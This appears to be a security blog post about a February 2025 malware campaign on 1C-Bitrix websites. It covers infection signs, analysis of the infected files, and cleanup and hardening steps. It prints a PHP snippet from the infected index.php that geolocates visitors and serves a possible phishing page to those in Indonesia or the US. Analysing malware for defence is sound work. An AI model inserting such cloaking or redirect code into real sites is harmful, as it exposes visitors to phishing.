February virus on Bitrix
Order a service
In early February 2025, a virus spread across the network that affected websites on the 1C-Bitrix platform. This malware is embedded in project files, creates additional directories, and performs suspicious actions, including collecting user information and redirects to external resources. However, signs of its activity indicate a modification of existing attack methods, rather than a completely new type of threat.
- Gets the user's IP address.
- Makes a request to the `ip-api.com` service to determine the country.
- If the user is from ** Indonesia or the United States **, includes the `readme.html` file, which may contain a phishing page or redirect.
Example of malicious code:
- Creation of hidden backdoor scripts.
- Run remote commands via `eval()` or `base64_decode()`.
- Connection to external servers for data transfer.
- Can be used to download new malicious scripts.
- Most often contains encrypted or obfuscated code.
- **Theft of user data** (IP, browser, geolocation).
- **Using the server for attacks** (spam, DDoS, hosting phishing pages).
- Check root `index.php` for malicious code.
- Configure `.htaccess` to protect against downloading executable files.
Main signs of infection
Creating new files and directories:
- Unknown files appear in the `/aspro_regions/robots/` folder.
- The files `robots.connections.php`, `wp-ver.php`, `index.php` are added to the root of the site.
- Directories with random names appear, for example, `1a869/`, `a410f/`, containing substituted `index.php`.
Change of main
- Malicious code is embedded into the file before `header.php` is included.
- The code uses obfuscation (`base64_encode`, `goto`), which makes it difficult to detect.
Parsing infected files
1. `index.php`
The file contains hidden code that does the following:- Gets the user's IP address.
- Makes a request to the `ip-api.com` service to determine the country.
- If the user is from ** Indonesia or the United States **, includes the `readme.html` file, which may contain a phishing page or redirect.
Example of malicious code:
php
$ip = getUserIP();
$api_url = " http://ip-api.com/json/{$ip}" ;
$response = file_get_contents($api_url);
$data = json_decode($response, true);
if ($data["countryCode"] === "ID" || $data["countryCode"] === "US") {
ob_start();
include "readme.html";
$output = ob_get_clean();
echo $output;
die;
}
`
2. `wp-ver.php`
This file disguises itself as WordPress (`wp-` in the name), but actually does:- Creation of hidden backdoor scripts.
- Run remote commands via `eval()` or `base64_decode()`.
- Connection to external servers for data transfer.
3. `robots.connections.php`
- This file controls communication with external servers.- Can be used to download new malicious scripts.
- Most often contains encrypted or obfuscated code.
The goal of the virus
- **Traffic interception** (redirects to phishing sites).- **Theft of user data** (IP, browser, geolocation).
- **Using the server for attacks** (spam, DDoS, hosting phishing pages).
How to protect yourself?
1. Check files and directories
- Remove `robots.connections.php`, `wp-ver.php`, unknown `index.php`.- Check root `index.php` for malicious code.
2. Update CMS and modules
- Make sure you are using the latest version of Bitrix.3. Restrict access to the server
- Disable execution of `eval()` in PHP configuration.- Configure `.htaccess` to protect against downloading executable files.
4. Check access rights
- Disallowed writing to `/bitrix/`, `/local/` and `/upload/`.5. Perform an antivirus scan
- Use `AI-Bolit`, `Virusdie`, `ClamAV` to scan files.Conclusion
This virus is a serious threat to Bitrix sites. It is important to regularly check files, monitor updates and use protective mechanisms. If your site is infected, it is recommended to immediately remove malicious files, conduct a security audit and strengthen protection.9 February 2025 (Boudybuilder) Виталий Фантич